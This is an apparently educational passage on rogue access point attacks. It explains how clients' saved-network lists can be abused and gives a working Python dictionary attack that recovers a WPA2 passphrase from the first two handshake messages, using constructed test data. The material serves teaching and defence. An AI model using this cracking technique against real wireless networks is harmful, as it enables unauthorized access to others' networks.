Theory
When a client connects to a wireless network, the device saves that network in a list called the Preferred Network List (PNL). The PNL lets the device reconnect automatically whenever a saved network is detected again. Large wireless networks typically have multiple APs advertising the same ESSID, so a device can join the network from many locations.
Imagine a client moving across a campus. It walks into range of several APs that all advertise the same ESSID, and it connects to the one with the strongest signal. An AP we control that advertises that ESSID with a stronger signal than the legitimate APs is therefore a candidate the client will pick.
Even if we do not know the Pre-Shared Key (PSK) of the network the client expects, our rogue AP can still complete the first two messages of the 4-way handshake: we send message 1 carrying our ANonce, and the client answers with message 2, which carries its SNonce and a MIC keyed with a value derived from the PSK. Those two messages, together with the two MAC addresses, are enough to crack the PSK offline. However, many devices also store the network's encryption details (security type and ciphers) in the PNL when the network is saved, and will not associate with an AP whose advertised settings differ. For a Rogue AP attack to succeed, the rogue AP must therefore match the target's encryption details, not just its ESSID.
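The following is an added example, not code from the original page, showing why messages 1 and 2 are sufficient: it derives the PMK from a candidate passphrase, expands it into the PTK using both MACs and both nonces, recomputes the message 2 MIC with the KCK, and compares it with the MIC the client sent. The SSID, MAC addresses, nonces, passphrases and the EAPOL frame itself are constructed here to stand in for a capture from a rogue AP; the key-derivation steps are the WPA2-Personal (CCMP, key descriptor version 2) ones.

```python
"""
Added example (not from the original page): offline PSK recovery from EAPOL
messages 1 and 2 of a WPA2 4-way handshake, as captured by a rogue AP.
All inputs below are constructed test data, not a real capture.
"""
import hashlib
import hmac


def pmk_from_psk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1 blocks, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """KCK is the first 128 bits of the PTK; the PTK binds both MACs and both nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


# EAPOL hdr (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + key IV (16) + key RSC (8) + key ID (8) = offset of the 16-byte MIC field
MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the MIC zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(psk, ssid, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """Construct a minimal EAPOL-Key message 2 as the client would send it (stand-in for a capture)."""
    key_data = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP / PSK
    body = (
        b"\x02"                  # descriptor type: RSN
        + b"\x01\x0a"            # key info: version 2 (HMAC-SHA1), pairwise, MIC present
        + b"\x00\x00"            # key length (0 in message 2)
        + b"\x00" * 7 + b"\x01"  # replay counter
        + snonce
        + b"\x00" * 16           # key IV
        + b"\x00" * 8            # key RSC
        + b"\x00" * 8            # key ID
        + b"\x00" * 16           # MIC placeholder, filled in below
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL version 2, type Key
    kck = derive_kck(pmk_from_psk(psk, ssid), ap_mac, sta_mac, anonce, snonce)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, message2, wordlist):
    """For each candidate: PSK -> PMK -> KCK -> MIC over message 2; return the first that matches."""
    captured_mic = message2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_kck(pmk_from_psk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, message2), captured_mic):
            return candidate
    return None


# Constructed scenario (hypothetical names and values, not captured data)
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("00133700a0b1")   # our rogue AP's BSSID
STA_MAC = bytes.fromhex("021122334455")  # the victim client
ANONCE = bytes(range(32))                # from message 1; really 256 random bits we chose
SNONCE = bytes(range(64, 96))            # from message 2; really 256 random bits the client chose
TRUE_PSK = "correcthorse"                # known only to the client in the real attack
MESSAGE2 = build_message2(TRUE_PSK, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)


def demo_crack(wordlist):
    """Run the dictionary attack against the constructed message 2."""
    return crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, MESSAGE2, wordlist)


if __name__ == "__main__":
    print(demo_crack(["password", "letmein", "correcthorse", "Winter2024"]))
```

Nothing in the cracking loop needs message 3 or 4: the ANonce is ours, the SNonce and MIC come from the client, and the MACs come from the frame headers, so the attack works even though the rogue AP never completed the handshake. Note the cost lives in `pmk_from_psk` (4096 PBKDF2 rounds per candidate), which is why real tooling precomputes or GPU-accelerates that step.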